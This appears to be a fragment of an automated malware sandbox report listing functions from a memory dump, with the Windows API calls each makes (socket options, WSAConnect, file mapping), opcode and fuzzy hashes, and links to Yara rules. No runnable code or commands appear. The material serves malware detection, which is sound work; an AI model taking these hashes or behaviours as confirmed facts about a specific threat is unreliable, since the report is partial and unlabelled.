                                                  • API String ID: 1995159646-0
                                                  • Opcode ID: 0f63839cd5c34e48036891653c7210ce3d3247bdfbc38eecb33b0aa421d84ac5
                                                  • Instruction ID: ae02b7a87c7b9b3c6fc964d805ab9fa06457af1cb63822b7b0a3d9039b8076b6
                                                  • Opcode Fuzzy Hash: 0f63839cd5c34e48036891653c7210ce3d3247bdfbc38eecb33b0aa421d84ac5
                                                  • Instruction Fuzzy Hash: A611BE71500640AFEB218F69DC44F5BFFA8EF05320F14886BEA459B251D670E408CB71
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB13C4, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenFileMappingW.KERNELBASE(?,?,?), ref: 1AEB143A
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: FileMappingOpen
                                                  • String ID:
                                                  • API String ID: 1680863896-0
                                                  • Opcode ID: 50ad5d0f5de7f6f7d384a293e6c337c167a4510c8ff51dbdada6d84ee2b63190
                                                  • Instruction ID: 714dbe373c0a23d0d2a7aa42a509c3fe8f2c9f4e7718687995a40c7a6c41199b
                                                  • Opcode Fuzzy Hash: 50ad5d0f5de7f6f7d384a293e6c337c167a4510c8ff51dbdada6d84ee2b63190
                                                  • Instruction Fuzzy Hash: 05216A714093C4AFD7128F65DC44B92BFB8EF46224F0984EBE9898B163D275E948CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB1052, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • getsockname.WS2_32(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB10B3
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: getsockname
                                                  • String ID:
                                                  • API String ID: 3358416759-0
                                                  • Opcode ID: c271397bc32378cbfcc47e2a77ae8d2626717895beb02e22476d6eb51ec7fe09
                                                  • Instruction ID: b6e8aaf306b929c5a57662403851af6b500667422f262fda8869d0972f8302c0
                                                  • Opcode Fuzzy Hash: c271397bc32378cbfcc47e2a77ae8d2626717895beb02e22476d6eb51ec7fe09
                                                  • Instruction Fuzzy Hash: 3D119D71540344AEE720CF59DC84F97FBA8EF45320F1484ABEE499B241D674E508CB71
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB0102, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • setsockopt.WS2_32(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB0161
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: setsockopt
                                                  • String ID:
                                                  • API String ID: 3981526788-0
                                                  • Opcode ID: b8ef7aad4f727430a04b2b632f87a31a39d4a7f779c2f91511bf1c6a1523788b
                                                  • Instruction ID: 440ea38de7b9311efb8fbc976f9c40da2692e07e7c661638ad0a15becf713326
                                                  • Opcode Fuzzy Hash: b8ef7aad4f727430a04b2b632f87a31a39d4a7f779c2f91511bf1c6a1523788b
                                                  • Instruction Fuzzy Hash: D9119A72400204AFEB218F55DC84F9AFFA8EF45320F1488ABEA499B251C674A409CBB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB1136, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ioctlsocket.WS2_32(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB118F
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: ioctlsocket
                                                  • String ID:
                                                  • API String ID: 3577187118-0
                                                  • Opcode ID: ee084592677604f8dd964c186a32b08afb6daba73967bb8d2e15974c0b86b33d
                                                  • Instruction ID: 20958535f88fe82848a15b394a9bedd35e5894bbb462ae392cb608e703584734
                                                  • Opcode Fuzzy Hash: ee084592677604f8dd964c186a32b08afb6daba73967bb8d2e15974c0b86b33d
                                                  • Instruction Fuzzy Hash: B1119E71400244AEE721CF55DC84B56FFA8EF45320F14C8ABEE499B251D674E509CBB5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB16DA, Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 1AEB1726
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: Connect
                                                  • String ID:
                                                  • API String ID: 3144859779-0
                                                  • Opcode ID: 9d07df911e3902abe521381a6b67f58e74570b943801d7e8ef6064578c958ab7
                                                  • Instruction ID: 797ab044d99b53d8ccfc2ef88928c99964d63b39025f71984963966e214ab428
                                                  • Opcode Fuzzy Hash: 9d07df911e3902abe521381a6b67f58e74570b943801d7e8ef6064578c958ab7
                                                  • Instruction Fuzzy Hash: 19115A35400744AFDB20CF55D848B56FFE4EF05220F1889AADE498B622D371E418DB71
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB13FA, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenFileMappingW.KERNELBASE(?,?,?), ref: 1AEB143A
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: FileMappingOpen
                                                  • String ID:
                                                  • API String ID: 1680863896-0
                                                  • Opcode ID: b7f2785ec83828e67689802db51e3cfcc00e3fb5d5a17bdd28c1b35bdedde01b
                                                  • Instruction ID: 8d6a017bb78e101079e28d609a1665232fd3b6863fbb3fc4ef729f4a11b145dd
                                                  • Opcode Fuzzy Hash: b7f2785ec83828e67689802db51e3cfcc00e3fb5d5a17bdd28c1b35bdedde01b
                                                  • Instruction Fuzzy Hash: 3F019E71900340AFE710CF55D888B96FFA4EF44220F08C8ABDE498B202D275E408CB72
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB14B2, Relevance: 1.5, APIs: 1, Instructions: 43fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 1AEB14F0
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: FileView
                                                  • String ID:
                                                  • API String ID: 3314676101-0
                                                  • Opcode ID: a0d3eb275cd4aa93eb51415fdcb7db922f4b41fdc3a0078259f78219078cdc2e
                                                  • Instruction ID: fe80a0cfb624cea735b6581325fde988c91ec1fb9a27b190deda09cbf4f03985
                                                  • Opcode Fuzzy Hash: a0d3eb275cd4aa93eb51415fdcb7db922f4b41fdc3a0078259f78219078cdc2e
                                                  • Instruction Fuzzy Hash: 92018C36400744EFDB20DF95D848B56FFA0EF04321F18C8AADE4A4B212D275E418DB72
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions